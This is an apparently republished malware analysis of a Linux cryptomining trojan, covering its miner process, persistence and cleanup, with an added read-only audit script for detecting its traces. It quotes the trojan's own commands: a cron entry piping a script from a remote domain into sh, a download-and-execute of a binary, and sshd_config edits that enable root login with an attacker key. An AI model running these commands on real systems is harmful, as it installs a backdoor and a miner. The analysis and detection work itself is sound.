How Mining Trojans Hijack Linux Servers: Sample 101 Analysis and Defense

The article examines a cryptocurrency mining trojan (sample 101), detailing its process list, malicious startup scripts, SSH key injection, service deployment, removal steps, and offers practical defense measures against such malware infections.

ITPUB

Sample 101 Malware Overview

The continued analysis of sample 101 shows that threat actors embed trojans to commandeer large numbers of hosts and use them for on-demand DDoS attacks or cryptocurrency mining. The process list on an infected host shows:

/opt/minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:8080 -u 48vKMSzWMF8TCVvMJ6jV1BfKZJFwNXRntazXquc7fvq9DW23GKkcvQMinrKeQ1vuxD4RTmiYmCwY4inWmvCXWbcJHL3JDwp -p x

This is a cryptonight miner connecting to a remote mining pool.

Malicious Startup Script

The trojan installs a cron job that repeatedly downloads and executes a script from a malicious domain:

*/15 * * * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh

It also creates a hidden SSH private key file /root/.ssh/KHK75NEOiq and injects the attacker’s public key, then modifies /etc/ssh/sshd_config to enable root login and public‑key authentication:

echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config

After updating the configuration, the script restarts the SSH daemon (/etc/init.d/sshd restart).

Next, the script checks for the presence of a service named lady. If missing, it downloads a binary from https://r.chanstring.com/v12/lady_`uname -i`, makes it executable, and runs it:

mkdir -p /opt && curl -fsSL https://r.chanstring.com/v12/lady_`uname -i` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33

The service is then started via multiple methods (service lady start, systemctl start lady.service, /etc/init.d/lady start).

Removal Instructions

The article provides a set of commands to stop and clean the infection:

# systemctl stop lady.service
# pkill /opt/cron
# pkill /usr/bin/cron
# rm -rf /etc/init.d/lady
# rm -rf /etc/systemd/system/lady.service
# rm -rf /opt/KHK75NEOiq33
# rm -rf /usr/bin/cron
# rm -rf /usr/bin/.cron.old
# rm -rf /usr/bin/.cron.new

Business Impact

Infected machines experience severe performance degradation, high CPU load, and constant fan activity. The mining trojan consumes large amounts of electricity and accelerates wear on CPUs and GPUs. Because Bitcoin transactions are anonymous and irreversible, stolen cryptocurrency is difficult to trace, which makes mining an attractive activity for attackers.

Attack Vectors and Defense Strategies

Typical infection paths include exploiting weak security policies and vulnerabilities in services such as Jenkins or Redis to gain root privileges. Effective defense focuses on hardening configurations, applying patches promptly, and closely monitoring server resource usage (CPU and load). The malware mutates frequently, so signature-based antivirus solutions may fail to detect it; the article includes a sample hash for reference:

63210b24f42c05b2c5f8fd62e98dba6de45c7d751a2e55700d22983772886017
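A read-only host audit that turns the indicators above into checks: the appended sshd_config directives, the download-and-pipe cron entry, the artefact paths from the removal steps, and the miner's command-line traits from the process listing. This is an added example, not code from the original article or from ITPUB; it assumes a POSIX shell with awk, grep and procps ps, and the --live flag, the function names and the output tags are the example's own.

```shell
#!/bin/sh
# Added example (not from the original article): read-only audit for the sample 101
# persistence indicators described above. Each function takes the file(s) or root
# directory to inspect, so it runs against a live host or a mounted image alike.

# sshd_config tampering: the dropper appends directives instead of editing them,
# so a keyword occurs twice, and AuthorizedKeysFile names a non-default file.
audit_sshd_config() {
    awk '
        { key = tolower($1) }
        key ~ /^(permitrootlogin|rsaauthentication|pubkeyauthentication|authorizedkeysfile)$/ { seen[key]++ }
        key == "authorizedkeysfile" {
            for (i = 2; i <= NF; i++)
                if ($i !~ /^(%h\/)?\.ssh\/authorized_keys2?$/) print "NONDEFAULT_AUTHORIZED_KEYS " $i
        }
        END { for (k in seen) if (seen[k] > 1) print "DUPLICATE_DIRECTIVE " k " x" seen[k] }
    ' "$1" 2>/dev/null || true
}

# Crontab lines that fetch a remote script and pipe it straight into a shell, the
# shape of the */15 entry above; matching the pattern, not the domain, survives mutation.
audit_cron() {
    grep -HnE '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh([[:space:]]|$)' "$@" 2>/dev/null || true
}

# Artefact paths from the removal steps, checked under a root directory
# ("/" for the live system, or the mount point of an image).
audit_paths() {
    root="${1%/}"
    for p in /opt/KHK75NEOiq33 /opt/cron /etc/init.d/lady /etc/systemd/system/lady.service \
             /root/.ssh/KHK75NEOiq /usr/bin/.cron.old /usr/bin/.cron.new; do
        if [ -e "$root$p" ]; then echo "ARTEFACT_PRESENT $root$p"; fi
    done
}

# Miner traits from the process listing: a stratum pool URL or a cryptonight
# algorithm selector. Exit status 0 means the command line looks like a miner.
looks_like_miner() {
    printf '%s\n' "$1" | grep -qiE 'stratum\+tcp://|(^|[[:space:]])-a[[:space:]]+cryptonight'
}

# Stand-alone use: sh audit.sh --live (as root, so every crontab is readable).
if [ "${1:-}" = "--live" ]; then
    audit_sshd_config /etc/ssh/sshd_config
    audit_cron /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/* /var/spool/cron/*
    audit_paths /
    ps -eo args= | while IFS= read -r line; do
        if looks_like_miner "$line"; then echo "MINER_PROCESS $line"; fi
    done
fi
```

Each function prints one tagged line per finding and nothing on a clean input, so the output can be diffed between hosts or fed to a log shipper.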
